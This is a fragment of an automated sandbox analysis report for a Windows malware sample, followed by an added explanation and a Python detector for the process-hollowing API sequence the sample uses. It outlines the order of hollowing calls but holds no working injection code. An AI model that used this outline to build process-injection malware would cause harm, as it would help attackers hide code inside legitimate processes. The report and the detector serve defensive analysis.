                                                          • Opcode ID: 666ba559bc18d421ad227e9a65270f414d1111bf8c9c9a36d4e28e4eb9f8e823
                                                          • Instruction ID: b015368c4acf0b936897be1e79aac14bbfe2690e7b81d8ed31418ab89e58862d
                                                          • Opcode Fuzzy Hash: 666ba559bc18d421ad227e9a65270f414d1111bf8c9c9a36d4e28e4eb9f8e823
                                                          • Instruction Fuzzy Hash: D141BD30914225CBDB08DF69C8502BEBBF1FF45301F958A27E065E6391D3388989DBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage: 14.3%
                                                          Dynamic/Decrypted Code Coverage: 100%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 93
                                                          Total number of Limit Nodes: 1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: d7ba515d5acca620d97c4f7cd32cacaa6c477de4c3721fad659b6942f095f95c
                                                          • Instruction ID: fb768304aa267efdbc4496de02c2f36c2ce81221c6dd4184a7561523567ea7c8
                                                          • Opcode Fuzzy Hash: d7ba515d5acca620d97c4f7cd32cacaa6c477de4c3721fad659b6942f095f95c
                                                          • Instruction Fuzzy Hash: 1B81C474E112098FDB48CFAAC944A9EFBF2FF89300F24942AD416AB258D735A945CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L08$l4
                                                          • API String ID: 0-2321431902
                                                          • Opcode ID: 1e77d76a4c9f8d0aecab6b3e7a689656cf4669ed5958336c9ce3f7ce0537d31b
                                                          • Instruction ID: 640e378204afc0187babf8886cc2a1c1407e8084c94909e80ed451540c8bb316
                                                          • Opcode Fuzzy Hash: 1e77d76a4c9f8d0aecab6b3e7a689656cf4669ed5958336c9ce3f7ce0537d31b
                                                          • Instruction Fuzzy Hash: 7D51043140A7946FEF579F3898536D77BE8BF03304B4564EAD8009F293C620AA47E796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 7441f2b15942e33412de7c9d8d6d2c4e6de75d77623330337476cff3d0f98608
                                                          • Instruction ID: 4b1f77b6414e943b99e5c792a8fc4e04bec56fc4c098fc81a15440c7b576f813
                                                          • Opcode Fuzzy Hash: 7441f2b15942e33412de7c9d8d6d2c4e6de75d77623330337476cff3d0f98608
                                                          • Instruction Fuzzy Hash: 1AD14B74D1420ADFCB05DFA9C4848AEFBB6FF89300F20D555D516AB614D734AA82CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l4
                                                          • API String ID: 0-2837824225
                                                          • Opcode ID: 66d9e26701c3b6e0e9a12211eef17dcc7e21a6a697f9560848f949f61ce89591
                                                          • Instruction ID: bc78cc057c9aeefe992dcfd34e6af52f26f294335325088682dcf5ea4ab6cea1
                                                          • Opcode Fuzzy Hash: 66d9e26701c3b6e0e9a12211eef17dcc7e21a6a697f9560848f949f61ce89591
                                                          • Instruction Fuzzy Hash: 5761F634509340AFEB469F38DD57BD67BE5BF43304F16A09AD8009F693CA20E952EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l4
                                                          • API String ID: 0-2837824225
                                                          • Opcode ID: a91a0b8940bbd892df6245629d645bc9fddfcaff8609ac2c0b23caf31bdd2e89
                                                          • Instruction ID: 6b12d95bb60ec523644e4b4ff7d0c92f34476144b4678eeead0028c945715d14
                                                          • Opcode Fuzzy Hash: a91a0b8940bbd892df6245629d645bc9fddfcaff8609ac2c0b23caf31bdd2e89
                                                          • Instruction Fuzzy Hash: B05126314097906FEF579F3889537EB3BE5AF43304B45A4E9D4018F253CA20AA87E796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 224f6d79db6a55fdc4d30f946edf3ab8a8e0ee00e867cb9779d5081a6c6656dd
                                                          • Instruction ID: efdfa63856e6685b0abc509aa4f7c7df0be9130b92e143ba0a47143971ff9860
                                                          • Opcode Fuzzy Hash: 224f6d79db6a55fdc4d30f946edf3ab8a8e0ee00e867cb9779d5081a6c6656dd
                                                          • Instruction Fuzzy Hash: AD117CB1E016598BEB18CF9BD9501DEFBF3BFC8310F14C076D509AA228DB7459568B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$Tep$Tep$Tep$Tep$Tep$$p$$p$$p$$p$h8$h8
                                                          • API String ID: 0-2147537707
                                                          • Opcode ID: 962ebea0421fb8ad72e27a87463ff203d385ff769d32e0fd0e84c176b0b879dc
                                                          • Instruction ID: 925fa94c59fe758ff98d7eb698a91b8c971aa796dc97d377a0a4da9933ab9633
                                                          • Opcode Fuzzy Hash: 962ebea0421fb8ad72e27a87463ff203d385ff769d32e0fd0e84c176b0b879dc
                                                          • Instruction Fuzzy Hash: 25028F30B00204DFDB1A9BA8C865BBE7AF6AF88301F658465E906EF795CF749C41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$Tep$XXp$XXp$$p$$p$$p$$p$$p$$p
                                                          • API String ID: 0-4160604773
                                                          • Opcode ID: 2ff6827430926778272e07ab0be7910ab68bd61b6af7d0e12130b5b113e4e1e2
                                                          • Instruction ID: eb2d37eaafba013bfb11623c2d199afa51f55428954306e28d6ed80d10d039fb
                                                          • Opcode Fuzzy Hash: 2ff6827430926778272e07ab0be7910ab68bd61b6af7d0e12130b5b113e4e1e2
                                                          • Instruction Fuzzy Hash: 19914E30E04248CFDB1ADBA8D445BAEBBF6BB85301F658566E412AF794CB70AC41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3426324077
                                                          • Opcode ID: cb74dbe22ce14c536f789cb59dd8acffd776688c98f8483a61c2b92e3c8a9a4b
                                                          • Instruction ID: a66dd15eca68d6f63ab99c22fe1146fef4616f6cc2fefa13b97b6449bcc9b39c
                                                          • Opcode Fuzzy Hash: cb74dbe22ce14c536f789cb59dd8acffd776688c98f8483a61c2b92e3c8a9a4b
                                                          • Instruction Fuzzy Hash: 2B718E30E04248CFDB1ADB98D445BAEBBF6BF85301F698567E412AF295CB70AC41DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: basic blocks 0x341903-0x341c81, no call edges (graph rendered as an image; executed/not-executed colouring and edge list not reproduced)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: b94676ff30fcd7cce6241a9a55461eede1e047575f2087e436f92332d2248581
                                                          • Instruction ID: 8ff59c2cadfbf968a88314aeac914dd2fa8604bb210659f6373fc02d4ebf4e48
                                                          • Opcode Fuzzy Hash: b94676ff30fcd7cce6241a9a55461eede1e047575f2087e436f92332d2248581
                                                          • Instruction Fuzzy Hash: FC817D30E04A48CFDB16CB94D445BACBBF5FB81301F6A8066E416AF695D770ACC1DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: basic blocks 0x348830-0x348c05, calls to 0x554640 and 0x553980 (graph rendered as an image; executed/not-executed colouring and edge list not reproduced)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h8
                                                          • API String ID: 0-3008218487
                                                          • Opcode ID: 85e6671f6ce3f65aa0960f6071cf512aba2ab3bdd7f07b0c6bf5fb559cd37f91
                                                          • Instruction ID: fcd07abc8680737e28f7c1f96e9fb5807cf40fc941ff0734cde7ae1f7555eaab
                                                          • Opcode Fuzzy Hash: 85e6671f6ce3f65aa0960f6071cf512aba2ab3bdd7f07b0c6bf5fb559cd37f91
                                                          • Instruction Fuzzy Hash: 45819E30B00204DFDB1A9B68D815BBE7AF6AF84301F6584A5E806EF795CF74AC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: basic blocks 0x3488d2-0x348c05, calls to 0x554640 and 0x553980 (graph rendered as an image; executed/not-executed colouring and edge list not reproduced)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $p$$p$h8
                                                          • API String ID: 0-3008218487
                                                          • Opcode ID: a3041e5c98e387dcc58fe5f332a58c141fd5d92fa41f24102f97e5f9743f54fe
                                                          • Instruction ID: 286cc0db850af069d1b6436eb5fc453b086a410bfaa1577cbfddaac302be093d
                                                          • Opcode Fuzzy Hash: a3041e5c98e387dcc58fe5f332a58c141fd5d92fa41f24102f97e5f9743f54fe
                                                          • Instruction Fuzzy Hash: 2E719030B003049FDB169B68D815BBE7AE6AF88705F2580A5E906EF395CF749C41CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: basic blocks 0x34b4f8-0x34b66e, no call edges (graph rendered as an image; executed/not-executed colouring and edge list not reproduced)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$Pc8
                                                          • API String ID: 0-1111349688
                                                          • Opcode ID: cf76848b337f544f54ac3465bbe0fe0442b8de0f4409801859c57d36dc49a7a1
                                                          • Instruction ID: dea90bcdaf8ed18d65042a575bcd61ef81ab6e9720f0e59d1ea52af947c32329
                                                          • Opcode Fuzzy Hash: cf76848b337f544f54ac3465bbe0fe0442b8de0f4409801859c57d36dc49a7a1
                                                          • Instruction Fuzzy Hash: 7F41DF31A04610CBD7529B69D9846BAF7F4EB42701F06C5ABE466CF5A1E338E980D611
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: basic blocks 0x340848-0x3408d9, no call edges (graph rendered as an image; executed/not-executed colouring and edge list not reproduced)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: hF/$tG/
                                                          • API String ID: 0-3622080550
                                                          • Opcode ID: 5fd63b44504a261674fd32353823cbac0dd3c7becb3c74e9457c415729ec58f4
                                                          • Instruction ID: c4f91de288eddc31934f24dba110fe9a1348c0cd2379e706e503720438e46f64
                                                          • Opcode Fuzzy Hash: 5fd63b44504a261674fd32353823cbac0dd3c7becb3c74e9457c415729ec58f4
                                                          • Instruction Fuzzy Hash: DE01ED71D1020D9FCB41EFA8D9516AEFBB1EF48300F1089A5C515A7354EB745A549F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0055CFFF
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: df47ed4d2b392b3ced93b0225fd19157171eedf4f02c655f615b5fdc331e64d1
                                                          • Instruction ID: 70deeb4c4a9f17c664c282acba1da2ad75b802ce00c61b65a3648d2c57a44252
                                                          • Opcode Fuzzy Hash: df47ed4d2b392b3ced93b0225fd19157171eedf4f02c655f615b5fdc331e64d1
                                                          • Instruction Fuzzy Hash: EFC12571D002198FDF25CFA8C855BEEBBB1BF09305F0091AAD819B7250DB749A89CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CA73
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 84ef86a685cfe5ee8d86edaf81f2883e328ec5a9a91c30e1694fd34a64edce71
                                                          • Instruction ID: fc36e87a1525f02c0f4672b6dc1cea52aa3bea81fb708e8cdd69140011659299
                                                          • Opcode Fuzzy Hash: 84ef86a685cfe5ee8d86edaf81f2883e328ec5a9a91c30e1694fd34a64edce71
                                                          • Instruction Fuzzy Hash: EB41BBB4D002589FCF10CFA9D984AEEBFF1BB49310F24902AE814B7210D334AA45CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CA73
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 96247e747c380a217118cd0487d66de2d8eebdaead4bdddf4d8d5db45c3e6f06
                                                          • Instruction ID: 6f6b9433282800582247f973517de7635826063d4bdae5e91401bd37e5b35c80
                                                          • Opcode Fuzzy Hash: 96247e747c380a217118cd0487d66de2d8eebdaead4bdddf4d8d5db45c3e6f06
                                                          • Instruction Fuzzy Hash: F841A9B4D002589FCF10CFA9D984AEEFFF1BB49314F20942AE814B7210D334AA45CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CBB2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 3878a7dff41533e36db5d076ed3778e0169f2e54c4608200ff8cf0275e3905de
                                                          • Instruction ID: d868ea7c02deb20d6b1243b509f05084f0e981b6626a5f531eb8c7ff1b97b57b
                                                          • Opcode Fuzzy Hash: 3878a7dff41533e36db5d076ed3778e0169f2e54c4608200ff8cf0275e3905de
                                                          • Instruction Fuzzy Hash: F941A8B8D002589FCF10CFA9D984AEEFFB1BB49310F20942AE814B7210D334A945CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CBB2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 31fab8a58e3bdbbb353659a34015c00804ab13a3cfeda7b4e7aa299b1386d54a
                                                          • Instruction ID: e4c93285ec7c6c32f9088baf7c64049d8fd4b8eae4c8cc70a1bf7adcafdf6df2
                                                          • Opcode Fuzzy Hash: 31fab8a58e3bdbbb353659a34015c00804ab13a3cfeda7b4e7aa299b1386d54a
                                                          • Instruction Fuzzy Hash: 974199B9D002589FCF10CFA9D984AEEFFB1BB49320F10942AE814B7200D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0055C922
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c9a5da17254a00160d75bf062295bf6c8fd454b49733aaa989e1bb5a6759d4ca
                                                          • Instruction ID: da2d3a13e7b9a26aaaeef4c3b028bda9fffea795d042ecfc63726b3fb0e4c7ca
                                                          • Opcode Fuzzy Hash: c9a5da17254a00160d75bf062295bf6c8fd454b49733aaa989e1bb5a6759d4ca
                                                          • Instruction Fuzzy Hash: D54199B8D002589FCF10CFA9E984AEEFBB1BB49310F20942AE815B7314D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0055C922
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6e2d0becae73d8b04b75233f3d4e321180242df595a899180be4b9a78d2f5a3c
                                                          • Instruction ID: 9df19836fe16ca05cec3ee467eb48565e6fdbad11abc6fb485cb50cc110057d9
                                                          • Opcode Fuzzy Hash: 6e2d0becae73d8b04b75233f3d4e321180242df595a899180be4b9a78d2f5a3c
                                                          • Instruction Fuzzy Hash: 814178B9D002589FCF10CFA9D984AEEFBB1BB49310F20A42AE815B7314D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0055C7F7
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 3dae4c770274cba626a4186cbc49e37bc591c791f7a602e960a57f02a08c7447
                                                          • Instruction ID: e8e55a56f18ea0f897477a0a1bfa1ed486a3d109d31f045af8f5faee9c42031e
                                                          • Opcode Fuzzy Hash: 3dae4c770274cba626a4186cbc49e37bc591c791f7a602e960a57f02a08c7447
                                                          • Instruction Fuzzy Hash: 09419CB5D002589FCB10CFA9D984AEEFFF1BB49314F24842AE814B7244D778A949CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: dea4fad4abb21a6b3079c9c949c479d59c2227729c4af04c76709d703367f1b0
                                                          • Instruction ID: 634dda10f51f4fd5b7330d085907b403ecde36faec4ae3ab1cd251dfec45d1fe
                                                          • Opcode Fuzzy Hash: dea4fad4abb21a6b3079c9c949c479d59c2227729c4af04c76709d703367f1b0
                                                          • Instruction Fuzzy Hash: 0531B9B4D002189FCF10CFA9E984AAEFBB5BB49314F24942AE815B7300D735A905CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
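The API references listed for the 0x550000 region of process 13 (CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread) are the primitive set of process hollowing: a child is created suspended, its image is replaced through VirtualAllocEx and WriteProcessMemory, the entry point is redirected by rewriting the thread context, and the primary thread is resumed. The detector below is an added example and is not part of the Joe Sandbox report or of the sample's code. It runs that ordering check over a per-process API trace; the trace line format, the handle values, the CREATE_SUSPENDED flag, the image name and the written bytes are constructed, since the report shows the calls but not their arguments. It also treats SetThreadContext, NtSetContextThread and CreateProcessW as equivalents, which generalises beyond the 32-bit WoW64 case the report shows.

```python
"""Flag the process-hollowing API sequence in a per-process API-call trace.

Added example, not part of the Joe Sandbox report.  Trace lines are
constructed; handle values, flags, image name and written bytes are assumed.
"""

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit for CreateProcess*

# Milestones of classic hollowing, in the order they must occur against the
# same suspended child.  Repeated milestones (one WriteProcessMemory per
# section) and unrelated calls in between (ReadProcessMemory) are tolerated.
HOLLOW_SEQUENCE = ("VirtualAllocEx", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread")

# Variants that play the same role; the report's sample is a 32-bit injector
# under WoW64, hence Wow64SetThreadContext, but a native one would use these.
ALIASES = {
    "SetThreadContext": "Wow64SetThreadContext",
    "NtSetContextThread": "Wow64SetThreadContext",
    "CreateProcessW": "CreateProcessA",
}


def parse_line(line):
    """Parse 'pid=13 api=X k=v ...' into a dict; None for malformed lines."""
    fields = {}
    for token in line.split():
        if "=" not in token:
            return None
        key, value = token.split("=", 1)
        fields[key] = value
    if "pid" not in fields or "api" not in fields:
        return None
    fields["pid"] = int(fields["pid"])
    fields["api"] = ALIASES.get(fields["api"], fields["api"])
    return fields


def detect_hollowing(lines):
    """Return one record per child process that completed the full sequence."""
    tracked = {}   # (pid, hProcess) -> per-child state
    threads = {}   # (pid, hThread)  -> (pid, hProcess) of the suspended child
    hits = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        pid, api = ev["pid"], ev["api"]

        if api == "CreateProcessA":
            if int(ev.get("flags", "0"), 16) & CREATE_SUSPENDED:
                key = (pid, ev["hProcess"])
                tracked[key] = {"stage": 0, "mz": False,
                                "image": ev.get("image", "?")}
                threads[(pid, ev["hThread"])] = key
            continue

        # Thread-handle APIs (SetThreadContext, ResumeThread) are mapped back
        # to the child process they belong to.
        if "hProcess" in ev:
            key = (pid, ev["hProcess"])
        else:
            key = threads.get((pid, ev.get("hThread")))
        state = tracked.get(key)
        if state is None or state["stage"] >= len(HOLLOW_SEQUENCE):
            continue

        if api == HOLLOW_SEQUENCE[state["stage"]]:
            state["stage"] += 1
        if api == "WriteProcessMemory" and \
                ev.get("data", "").lower().startswith("4d5a"):
            state["mz"] = True   # a PE header ("MZ") went into the child

        if state["stage"] == len(HOLLOW_SEQUENCE):
            hits.append({"pid": pid, "hProcess": key[1],
                         "image": state["image"], "pe_written": state["mz"]})
    return hits


# Constructed trace modelled on the report's API list for process 13.
HOLLOWING_TRACE = """
pid=13 api=CreateProcessA image=host.exe flags=0x4 hProcess=0x2a8 hThread=0x2ac
pid=13 api=ReadProcessMemory hProcess=0x2a8 addr=0x7ffd0008 size=4
pid=13 api=VirtualAllocEx hProcess=0x2a8 addr=0x400000 size=0x2c000 protect=0x40
pid=13 api=WriteProcessMemory hProcess=0x2a8 addr=0x400000 size=0x400 data=4d5a9000
pid=13 api=WriteProcessMemory hProcess=0x2a8 addr=0x401000 size=0x1a000 data=558bec83
pid=13 api=Wow64SetThreadContext hThread=0x2ac eax=0x40b2c0
pid=13 api=ResumeThread hThread=0x2ac
""".strip().splitlines()

# Constructed benign trace: a debugger-style parent creates a suspended child,
# inspects it and resumes it without ever writing into it.
BENIGN_TRACE = """
pid=21 api=CreateProcessW image=child.exe flags=0x4 hProcess=0x1f0 hThread=0x1f4
pid=21 api=ReadProcessMemory hProcess=0x1f0 addr=0x7ffd0000 size=0x1000
pid=21 api=ResumeThread hThread=0x1f4
""".strip().splitlines()


if __name__ == "__main__":
    for hit in detect_hollowing(HOLLOWING_TRACE + BENIGN_TRACE):
        print("hollowing:", hit)
```

Wow64SetThreadContext rather than SetThreadContext tells you the injecting process is a 32-bit image on 64-bit Windows; a production rule should key on all three context-setting variants, as the alias table does, and should treat the sequence as a strong indicator only when one of the WriteProcessMemory calls lands a PE header (the pe_written field), which keeps debuggers and instrumentation tools that also create suspended children out of the alert.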

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: lb8
                                                          • API String ID: 0-3242547949
                                                          • Opcode ID: 0943888639e0ede753f51adea9d3dfdeb197842f1be63635d520fa1f9fd6e10d
                                                          • Instruction ID: 91225a4b39579430795a5cd7280f60eb7993caa9610d5f4eaceff2b989722af8
                                                          • Opcode Fuzzy Hash: 0943888639e0ede753f51adea9d3dfdeb197842f1be63635d520fa1f9fd6e10d
